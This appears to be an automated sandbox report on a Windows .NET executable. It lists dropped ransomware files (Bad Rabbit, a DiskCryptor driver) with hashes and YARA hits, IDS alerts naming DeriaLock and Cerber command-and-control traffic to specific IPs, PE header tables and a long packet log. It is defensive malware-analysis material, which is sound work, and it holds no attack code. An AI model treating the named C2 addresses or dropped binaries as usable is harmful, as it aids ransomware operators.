                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):938498
                                                                                                                                                                                      Entropy (8bit):7.999770835729866
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                                                                                                      MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                                                                                                      SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                                                                                                      SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                                                                                                      SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe...
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):62328
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                      MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                                                                                                      SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                                                                                                                                      SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                                                                                                      SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):210632
                                                                                                                                                                                      Entropy (8bit):6.677691827536191
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                                                                                                      MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                                                                                                      SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                                                                                                      SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                                                                                                      SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):142848
                                                                                                                                                                                      Entropy (8bit):6.314365095327337
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                                                                                                      MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                                                      SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                                                                                                      SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                                                                                                      SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                                                      • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):410760
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                      MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                                                                                                      SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                                                                                                      SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                                                                                                      SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7
                                                                                                                                                                                      Entropy (8bit):2.2359263506290326
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:t:t
                                                                                                                                                                                      MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                                                      SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                                                      SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                                                      SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:Ok.....
                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Entropy (8bit):7.934512446694329
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                      File name:irH9zMhZub.exe
                                                                                                                                                                                      File size:152576
                                                                                                                                                                                      MD5:7d8f0e539e50eb545d094c50aab0ea9e
                                                                                                                                                                                      SHA1:9368da690ace5328abc4461cd8322d78c1fdc290
                                                                                                                                                                                      SHA256:f9c5420c0f039a178f5495ecfb657f8da383624e0cf7f02c645fbdfa95e2e8b9
                                                                                                                                                                                      SHA512:092d05eb357da75c2a6646a353e1c1cf7f0ae66ea32ac4beff8fda87160c9226417b187b4ac34e7b5745aaa65c8a6b8b33b9f02e19d9a959627544b50a3eae7a
                                                                                                                                                                                      SSDEEP:3072:Pmpq7ybSPGccu5R9Wl7rSmpVYc7+DUltw/ArIW1:epqG2eM5R9kNj2UlgJ
                                                                                                                                                                                      TLSH:99E3024C9A0CCE13E42A5AFD489E87453D29C470DDCAFA4D3778B992488F7D39A43627
                                                                                                                                                                                      Icon Hash:00828e8e8686b000
                                                                                                                                                                                      Entrypoint:0x4268ae
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                      Time Stamp:0x601F16E4 [Sat Feb 6 22:23:32 2021 UTC]
                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                      Instruction
                                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26858 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x566 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x248b4 | 0x24a00 | False | 0.9711964057167235 | data | 7.963291049609408 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x28000 | 0x566 | 0x600 | False | 0.408203125 | data | 3.9657132211361437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x280a0 | 0x2dc | data | |
RT_MANIFEST | 0x2837c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/29/22-14:52:28.844656 | TCP | 2824087 | ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity | 49767 | 80 | 192.168.2.6 | 162.55.0.137
09/29/22-14:50:24.513544 | UDP | 2023613 | ET TROJAN Ransomware/Cerber Checkin M3 (2) | 59083 | 6893 | 192.168.2.6 | 93.107.12.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                      Sep 29, 2022 14:49:48.970257998 CEST44349718140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:48.970509052 CEST44349718140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:48.970669985 CEST44349718140.82.121.4192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:48.970701933 CEST49718443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:49:48.970735073 CEST49718443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:49:48.974912882 CEST49718443192.168.2.6140.82.121.4
                                                                                                                                                                                      Sep 29, 2022 14:49:49.001861095 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.001946926 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.002510071 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.002510071 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.002612114 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.054955006 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.056195021 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.057913065 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.057939053 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.058434963 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.062932014 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.062990904 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.241731882 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.243940115 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.244002104 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.244091034 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.244123936 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.244167089 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.244194031 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.247102022 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.247159004 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.247265100 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.247308016 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.247358084 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.258915901 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.258960009 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.259092093 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.259126902 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.259154081 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.261347055 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.261369944 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.261466026 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.261492968 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.261507034 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.262936115 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.262969017 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.263056040 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.263077021 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.263128042 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.264795065 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.264817953 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.264923096 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.264946938 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.273648024 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.273682117 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.273796082 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.273827076 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.273849010 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.274946928 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.274971962 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.275033951 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.275058031 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.275077105 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.276038885 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.276067019 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.276145935 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.276174068 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.276197910 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.277708054 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.277733088 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.277786970 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.277812958 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.277828932 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.278593063 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.278626919 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.278681993 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.278701067 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.278717041 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.279762030 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.279788971 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.279859066 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.279880047 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.279925108 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.280742884 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.280776024 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.280843973 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.280883074 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.280909061 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.281815052 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.281847954 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.281929970 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.281949043 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.281976938 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289565086 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289599895 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289696932 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289750099 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289777994 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289900064 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.289979935 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290169001 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290200949 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290318012 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290318012 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290342093 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.290397882 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291198015 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291229963 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291305065 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291321039 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291348934 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291369915 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291433096 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291457891 CEST44349719185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:49:49.291510105 CEST49719443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.421886921 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.421967030 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.422020912 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.422046900 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.422077894 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.433804989 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.433885098 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.434014082 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.434052944 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.434077024 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.436034918 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.436075926 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.436131954 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.436163902 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.436189890 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.438523054 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.438556910 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439076900 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439109087 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439795971 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439836979 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439915895 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439943075 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.439958096 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.449317932 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.449343920 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.449521065 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.449573040 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.450361013 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.450387001 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.450484037 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.450514078 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.450532913 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.452058077 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.452075005 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.452186108 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.452214003 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.452230930 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.453039885 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.453080893 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.453217030 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.453241110 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454390049 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454410076 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454456091 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454507113 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454533100 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454550028 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454555035 CEST44349723185.199.108.133192.168.2.6
                                                                                                                                                                                      Sep 29, 2022 14:50:02.454618931 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:02.472927094 CEST49723443192.168.2.6185.199.108.133
                                                                                                                                                                                      Sep 29, 2022 14:50:08.753123045 CEST49725443192.168.2.6140.82.121.4
